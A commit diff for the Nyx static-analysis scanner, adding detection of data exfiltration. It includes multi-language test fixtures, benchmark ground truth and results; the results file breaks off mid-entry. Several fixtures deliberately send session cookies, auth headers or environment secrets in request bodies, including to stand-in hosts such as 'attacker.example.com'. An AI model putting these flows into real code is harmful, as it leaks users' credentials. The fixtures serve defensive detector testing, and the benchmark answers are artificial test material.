Add Cap::DATA_EXFIL and fix taint false positives (FP) and false negatives (FN) on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration
This commit is contained in:
Eli Peter 2026-05-01 10:59:52 -04:00 committed by GitHub
parent a438886217
commit 58f1794a4e
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
189 changed files with 8421 additions and 383 deletions

View file

@ -104,7 +104,33 @@ fn demand_driven_suite() {
"no_source: no backwards-confirmed notes on a source-free fixture"
);
// ── 5. backwards OFF is a strict no-op: no confirmed notes.
// ── 5. data_exfil cap parity: the backwards engine must
// round-trip `Cap::DATA_EXFIL` exactly like SQL/CMD/SSRF.
// The forward engine fires `taint-data-exfiltration`
// on a cookie → fetch-body flow; backwards must reach
// the request.cookies source and confirm.
set_backwards(true);
let dir = fixture_path("demand_driven_data_exfil");
let diags = scan_fixture_dir(&dir, AnalysisMode::Full);
validate_expectations(&diags, &dir);
let exfil_confirmed = diags
.iter()
.filter(|d| {
d.id.starts_with("taint-data-exfiltration")
&& has_backwards_note(d, "backwards-confirmed")
})
.count();
assert!(
exfil_confirmed >= 1,
"data_exfil: expected ≥1 backwards-confirmed taint-data-exfiltration finding; got diags: {}",
diags
.iter()
.map(|d| format!("{}:{}", d.id, d.line))
.collect::<Vec<_>>()
.join(", ")
);
// ── 6. backwards OFF is a strict no-op: no confirmed notes.
set_backwards(false);
let dir = fixture_path("demand_driven_reach_source");
let diags = scan_fixture_dir(&dir, AnalysisMode::Full);

View file

@ -0,0 +1,17 @@
// DATA_EXFIL: env-config (Sensitive source) flows into the gated
// curl_easy_setopt sink at the CURLOPT_POSTFIELDS activation. The
// destination URL is set by a separate CURLOPT_URL setopt above; only
// the body-binding setopt fires DATA_EXFIL.
#include <curl/curl.h>
#include <stdlib.h>
void leak_env(void) {
char *token = getenv("AUTH_TOKEN"); // source: secret read from the environment
if (!token) return; // nothing to send when the variable is unset
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); // fixed destination; this setopt is not the expected sink
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); // sink: binds the secret as the POST body
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,16 @@
// DATA_EXFIL safe: plain user input via fgets/stdin forwarded into the
// CURLOPT_POSTFIELDS body of a fixed-URL curl request must not fire.
// Sensitivity-gate strips the cap for Plain-tier sources.
#include <curl/curl.h>
#include <stdio.h>
void forward_stdin(void) {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return; // plain stdin input; bail out on EOF or read error
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); // fixed destination
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); // body bind; must stay silent for this Plain-tier source
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,14 @@
// DATA_EXFIL: a session cookie (Sensitive source) flows into the body
// of http.Post() at a hardcoded destination URL.
package fixture
import (
"net/http"
"strings"
)
func leakCookie(r *http.Request) {
c, _ := r.Cookie("session") // source: session cookie; the lookup error is discarded
body := strings.NewReader(c.Value) // wraps the cookie value as the request body
http.Post("https://analytics.internal/track", "text/plain", body) // sink: body sent to a hardcoded URL
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL safe: plain attacker-controlled user input forwarded to a
// fixed-destination http.Post body must not fire. Sensitivity-gate
// strips the cap because the source is Plain-tier user input.
package fixture
import (
"net/http"
"strings"
)
func forwardUserInput(r *http.Request) {
msg := r.FormValue("msg") // plain user input (Plain-tier), not a Sensitive source
body := strings.NewReader(msg) // wraps the form value as the request body
http.Post("https://analytics.internal/track", "text/plain", body) // fixed destination; DATA_EXFIL must not fire here
}

View file

@ -0,0 +1,23 @@
// DATA_EXFIL: a Sensitive cookie source flows through
// BodyPublishers.ofString() into the request builder chain and finally
// into client.send() at a hardcoded destination URL.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
public class DataExfilJdkHttpClient {
public void leak(HttpServletRequest request) throws Exception {
Cookie[] cookies = request.getCookies(); // source: servlet request cookies
String session = cookies[0].getValue(); // takes the first cookie's value without checking the array
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create("https://analytics.internal/track")) // hardcoded destination
.POST(BodyPublishers.ofString(session)) // cookie value becomes the request body
.build();
client.send(req, BodyHandlers.ofString()); // the request carrying the cookie value is sent here
}
}

View file

@ -0,0 +1,24 @@
// DATA_EXFIL: an OkHttp two-step where a session attribute (Sensitive
// source) is wrapped via RequestBody.create and bound to a request
// targeting a hardcoded URL. The chain-normalized newCall.execute
// matcher fires DATA_EXFIL on the body bind.
import javax.servlet.http.HttpSession;
import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;
public class DataExfilOkHttp {
public void leak(HttpSession session) throws Exception {
String token = (String) session.getAttribute("csrfToken"); // source: session attribute
OkHttpClient client = new OkHttpClient();
RequestBody body = RequestBody.create( // step 1: wrap the token as a request body
token, MediaType.parse("text/plain"));
Request req = new Request.Builder() // step 2: bind the body to a request
.url("https://analytics.internal/track") // hardcoded destination
.post(body)
.build();
Response resp = client.newCall(req).execute(); // request is sent; resp is never read or closed
}
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
// outbound body of fetch() at a fixed destination. SSRF must NOT fire
// because the URL is a hardcoded literal.
function leakBody(req) {
var payload = req.cookies.session; // source: session cookie
fetch('/endpoint', { // sink call; the URL is a literal
method: 'POST',
body: payload, // cookie value becomes the outbound body
});
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
// outbound body of fetch() at a hardcoded external, untrusted host. SSRF
// stays silent (URL is a static literal); DATA_EXFIL fires.
function leakBodyExternal(req) {
var payload = req.cookies.session; // source: session cookie
fetch('https://untrusted.example.com/intake', { // sink call; the absolute URL is a literal
method: 'POST',
body: payload, // cookie value becomes the outbound body
});
}

View file

@ -0,0 +1,9 @@
// DATA_EXFIL: a request header (Sensitive-tier source) flows into the
// body of XMLHttpRequest.send(). The destination is a static literal, so
// SSRF must not fire.
function leakHeader(req) {
var auth = req.headers.authorization; // source: Authorization request header
var xhr = new XMLHttpRequest();
xhr.open('POST', '/upstream'); // literal destination
xhr.send(auth); // sink: header value sent as the request body
}

View file

@ -0,0 +1,8 @@
// DATA_EXFIL safe: routing a Sensitive cookie source through the named
// telemetry boundary `logEvent` is the developer's explicit decision to
// forward; the default Sanitizer(data_exfil) convention strips the cap.
function track(req) {
logEvent({ // logEvent is not defined in this fixture; it is matched by name
user: req.cookies.session, // Sensitive cookie source passed to the wrapper
});
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL safe: plain user input echoed into a fetch() body must not
// fire. The user already controls req.body.message; surfacing it back
// into the outbound payload is not a cross-boundary disclosure.
function forwardUserMessage(req) {
var message = req.body.message; // plain user input, not a Sensitive source
fetch('/forward', { // literal destination
method: 'POST',
body: message, // user's own input echoed back out; must not fire
});
}

View file

@ -0,0 +1,17 @@
import os
from fastapi import FastAPI, Request
import httpx
app = FastAPI()
# DATA_EXFIL: env-config secret flows into the json kwarg of an async
# httpx.AsyncClient().post() at a fixed destination URL.
@app.post('/sync-async')
async def sync_async(req: Request):
api_key = os.environ.get('UPSTREAM_API_KEY')  # source: secret from the environment
await httpx.AsyncClient().post(  # sink call
'https://upstream.internal/ingest',  # fixed destination
json={'api_key': api_key},  # secret placed in the JSON body
)
return {'ok': True}

View file

@ -0,0 +1,16 @@
import os
import requests
from flask import Flask
app = Flask(__name__)
# DATA_EXFIL: env-config secrets accumulate into a dict, then flow as the
# json kwarg of requests.post() at a fixed destination URL.
@app.route('/upload-config', methods=['POST'])
def upload_config():
payload = {}
payload['api_key'] = os.environ.get('UPSTREAM_API_KEY')  # source: env secret stored in the dict
payload['region'] = os.environ.get('UPSTREAM_REGION')  # second env value stored in the same dict
requests.post('https://api.internal/ingest', json=payload)  # sink: dict sent as the JSON body
return 'ok'

View file

@ -0,0 +1,14 @@
import requests
from flask import Flask, request
app = Flask(__name__)
# DATA_EXFIL safe: plain user input echoed into a fixed-destination
# requests.post body must not fire. Sensitivity-gate strips the cap
# because the source is Plain-tier (raw user input).
@app.route('/forward', methods=['POST'])
def forward():
message = request.form.get('message')  # plain form input, not a Sensitive source
requests.post('https://telemetry.internal/forward', json={'message': message})  # fixed destination; must not fire
return 'ok'

View file

@ -0,0 +1,10 @@
require 'net/http'
require 'uri'
# DATA_EXFIL: an auth-token cookie (Sensitive source) is interpolated into
# the body string of Net::HTTP.post at a fixed destination URL.
def forward_session(request)
sid = request.cookies[:auth_token] # source: value of the auth_token cookie
uri = URI('https://analytics.internal/track') # fixed destination
Net::HTTP.post(uri, "session=#{sid}") # sink: cookie value interpolated into the POST body
end

View file

@ -0,0 +1,12 @@
require 'rest-client'
# DATA_EXFIL safe: plain user input echoed into a RestClient.post body
# at a fixed destination URL must not fire. Sensitivity-gate strips the
# cap for Plain-tier sources.
def forward_message(params)
message = params[:message] # plain user input, not a Sensitive source
RestClient.post(
'https://telemetry.internal/forward', # fixed destination
{ message: message }.to_json # user input serialized as the body; must not fire
)
end

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: env-config (Sensitive source) flows into reqwest's .form()
// chain at a fixed destination URL. The form-encoded payload leaks the
// operator-bound secret across the outbound boundary.
fn exfil_form() {
let secret = std::env::var("OAUTH_REFRESH_TOKEN").unwrap(); // source: env secret; panics if the variable is unset or not valid Unicode
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect") // hardcoded destination
.form(&secret) // secret bound as the form body
.send(); // result is discarded via `let _`
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
// outbound body of fetch() at a fixed destination. SSRF must NOT fire
// because the URL is a hardcoded literal.
function leakBody(req: { cookies: { session: string } }): void {
const payload = req.cookies.session; // source: session cookie
fetch('/endpoint', { // sink call; the URL is a literal
method: 'POST',
body: payload, // cookie value becomes the outbound body
});
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a request header (Sensitive-tier source) flows into the
// body of fetch() via the body field of the init object. Destination is
// a static literal so SSRF must not fire.
function leakHeader(req: { headers: { authorization: string } }): void {
const auth = req.headers.authorization; // source: Authorization request header
fetch('https://analytics.internal/track', { // sink call; the URL is a literal
method: 'POST',
body: auth, // header value becomes the outbound body
});
}

View file

@ -3,7 +3,7 @@
"metadata": {
"description": "Nyx benchmark ground truth",
"created": "2026-03-20",
"corpus_size": 458
"corpus_size": 477
},
"cases": [
{
@ -14474,6 +14474,576 @@
],
"disabled": false,
"notes": "Vulnerable counterpart to py-auth-realrepo-005: same FastAPI route shape but no `dependencies=[Depends(...)]` keyword arg. Regression guard: the dependency-injection recogniser must not blanket-suppress every FastAPI route."
},
{
"case_id": "js-data_exfil-001",
"file": "javascript/data_exfil/exfil_fetch_cookie_body.js",
"language": "javascript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"cookie"
],
"disabled": false,
"notes": "Cookie source flows into fetch body at hardcoded URL; DATA_EXFIL must fire and SSRF must not."
},
{
"case_id": "js-data_exfil-002",
"file": "javascript/data_exfil/exfil_fetch_external_destination.js",
"language": "javascript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"cookie",
"external-destination"
],
"disabled": false,
"notes": "Cookie source flows into fetch body at attacker-controlled host; DATA_EXFIL fires, SSRF does not."
},
{
"case_id": "js-data_exfil-003",
"file": "javascript/data_exfil/exfil_xhr_send_header.js",
"language": "javascript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[8, 8]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"xhr",
"header"
],
"disabled": false,
"notes": "Authorization header source flows into XMLHttpRequest.send body at hardcoded URL."
},
{
"case_id": "ts-data_exfil-001",
"file": "typescript/data_exfil/exfil_fetch_cookie_body.ts",
"language": "typescript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"cookie"
],
"disabled": false,
"notes": "TypeScript variant of js-data_exfil-001."
},
{
"case_id": "ts-data_exfil-002",
"file": "typescript/data_exfil/exfil_fetch_header_body.ts",
"language": "typescript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"header"
],
"disabled": false,
"notes": "Authorization header flows into fetch body at hardcoded URL."
},
{
"case_id": "py-data_exfil-001",
"file": "python/data_exfil/exfil_requests_post_env_dict.py",
"language": "python",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[14, 14]
],
"expected_source_lines": [
[12, 13]
],
"tags": [
"data_exfil",
"requests",
"env",
"container"
],
"disabled": false,
"notes": "Env-config secrets accumulate into a dict, then flow as the json kwarg of requests.post; container-taint round-trip."
},
{
"case_id": "py-data_exfil-002",
"file": "python/data_exfil/exfil_httpx_async_post_env.py",
"language": "python",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[12, 15]
],
"expected_source_lines": [
[11, 11]
],
"tags": [
"data_exfil",
"httpx",
"async",
"env"
],
"disabled": false,
"notes": "Env-config secret flows into httpx.AsyncClient().post json kwarg via the type-qualified HttpClient.post matcher."
},
{
"case_id": "java-data_exfil-001",
"file": "java/data_exfil/DataExfilJdkHttpClient.java",
"language": "java",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[16, 20]
],
"expected_source_lines": [
[13, 14]
],
"tags": [
"data_exfil",
"jdk-httpclient",
"cookie"
],
"disabled": false,
"notes": "Servlet cookie value flows through BodyPublishers.ofString into HttpClient.send body."
},
{
"case_id": "java-data_exfil-002",
"file": "java/data_exfil/DataExfilOkHttp.java",
"language": "java",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[15, 21]
],
"expected_source_lines": [
[13, 13]
],
"tags": [
"data_exfil",
"okhttp",
"session"
],
"disabled": false,
"notes": "HttpSession attribute wraps via RequestBody.create and binds to OkHttp Request.Builder.post; chain-normalized newCall.execute fires DATA_EXFIL."
},
{
"case_id": "go-data_exfil-001",
"file": "go/data_exfil/exfil_http_post_cookie_body.go",
"language": "go",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[12, 12]
],
"expected_source_lines": [
[10, 11]
],
"tags": [
"data_exfil",
"http-post",
"cookie"
],
"disabled": false,
"notes": "Cookie value flows via strings.NewReader into http.Post body at hardcoded URL."
},
{
"case_id": "rs-data_exfil-001",
"file": "rust/data_exfil/exfil_reqwest_form_env.rs",
"language": "rust",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[5, 8]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"reqwest",
"form",
"env"
],
"disabled": false,
"notes": "env::var secret flows into reqwest .form() body chain via the form.send body-bind matcher."
},
{
"case_id": "rb-data_exfil-001",
"file": "ruby/data_exfil/exfil_net_http_post_cookie.rb",
"language": "ruby",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[9, 9]
],
"expected_source_lines": [
[7, 7]
],
"tags": [
"data_exfil",
"net-http",
"cookie"
],
"disabled": false,
"notes": "request.cookies value flows into Net::HTTP.post body at hardcoded URL."
},
{
"case_id": "c-data_exfil-001",
"file": "c/data_exfil/exfil_curl_postfields_env.c",
"language": "c",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[14, 14]
],
"expected_source_lines": [
[9, 9]
],
"tags": [
"data_exfil",
"curl",
"gated-sink",
"env"
],
"disabled": false,
"notes": "getenv secret flows into curl_easy_setopt CURLOPT_POSTFIELDS body; gated-sink fires only at the body-binding setopt."
},
{
"case_id": "js-safe-data_exfil-001",
"file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js",
"language": "javascript",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"sanitizer-wrap"
],
"disabled": false,
"notes": "Cookie source routed through default forwarding-wrapper sanitizer (logEvent); DATA_EXFIL must not fire."
},
{
"case_id": "js-safe-data_exfil-002",
"file": "javascript/safe/safe_data_exfil_user_input_echo.js",
"language": "javascript",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "Plain user input echoed into fetch body at fixed URL; sensitivity-gate suppresses Plain-tier sources for Cap::DATA_EXFIL."
},
{
"case_id": "py-safe-data_exfil-001",
"file": "python/safe/safe_data_exfil_user_input_echo.py",
"language": "python",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "Flask form-field echoed into requests.post json at fixed URL; sensitivity-gate suppresses Plain-tier user input."
},
{
"case_id": "go-safe-data_exfil-001",
"file": "go/safe/safe_data_exfil_user_input_echo.go",
"language": "go",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "FormValue plain user input echoed into http.Post body at fixed URL; sensitivity-gate suppresses Plain-tier sources."
},
{
"case_id": "rb-safe-data_exfil-001",
"file": "ruby/safe/safe_data_exfil_user_input_echo.rb",
"language": "ruby",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "params plain user input echoed into RestClient.post body at fixed URL; sensitivity-gate suppresses Plain-tier sources."
},
{
"case_id": "c-safe-data_exfil-001",
"file": "c/safe/safe_data_exfil_user_input_echo.c",
"language": "c",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "fgets stdin user input echoed into curl_easy_setopt CURLOPT_POSTFIELDS at fixed URL; sensitivity-gate suppresses Plain-tier sources."
}
]
}

View file

@ -1,6 +1,6 @@
{
"benchmark_version": "1.0",
"timestamp": "2026-04-29T21:50:34Z",
"timestamp": "2026-04-30T23:44:32Z",
"scanner_version": "0.5.0",
"scanner_config": {
"analysis_mode": "Full",
@ -9,9 +9,9 @@
"state_analysis_enabled": true,
"worker_threads": 1
},
"ground_truth_hash": "sha256:5b391d654f88673e5a200af875d513cf83812af747739395e8315768b8983ce3",
"corpus_size": 458,
"cases_run": 457,
"ground_truth_hash": "sha256:228d1577d9560cfa08521e783ec513509363470455743a43a4102df713af1849",
"corpus_size": 477,
"cases_run": 476,
"cases_skipped": 1,
"outcomes": [
{
@ -181,6 +181,25 @@
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
"case_id": "c-data_exfil-001",
"file": "c/data_exfil/exfil_curl_postfields_env.c",
"language": "c",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 9:19)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 9:19)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "c-fmt-001",
"file": "c/fmt_string/fmt_printf.c",
@ -455,6 +474,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "c-safe-data_exfil-001",
"file": "c/safe/safe_data_exfil_user_input_echo.c",
"language": "c",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "c-ssrf-001",
"file": "c/ssrf/ssrf_curl.c",
@ -1685,11 +1719,14 @@
"matched_rule_ids": [
"rb.deser.yaml_load"
],
"unexpected_rule_ids": [],
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink",
"rb.deser.yaml_load"
],
"security_finding_count": 1,
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
@ -2066,6 +2103,25 @@
"security_finding_count": 3,
"non_security_finding_count": 0
},
{
"case_id": "go-data_exfil-001",
"file": "go/data_exfil/exfil_http_post_cookie_body.go",
"language": "go",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 11:10)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 11:10)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "go-fmt_string-001",
"file": "go/fmt_string/fmt_injection.go",
@ -2453,6 +2509,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "go-safe-data_exfil-001",
"file": "go/safe/safe_data_exfil_user_input_echo.go",
"language": "go",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "go-safe-fieldproj-phase3",
"file": "go/safe/safe_chained_receiver_field_proj.go",
@ -2660,15 +2731,13 @@
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 8:9)",
"taint-unsanitised-flow (source 8:9)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-unsanitised-flow (source 8:9)",
"taint-unsanitised-flow (source 8:9)"
],
"security_finding_count": 2,
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -2840,6 +2909,44 @@
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
"case_id": "java-data_exfil-001",
"file": "java/data_exfil/DataExfilJdkHttpClient.java",
"language": "java",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 14:28)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 14:28)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "java-data_exfil-002",
"file": "java/data_exfil/DataExfilOkHttp.java",
"language": "java",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
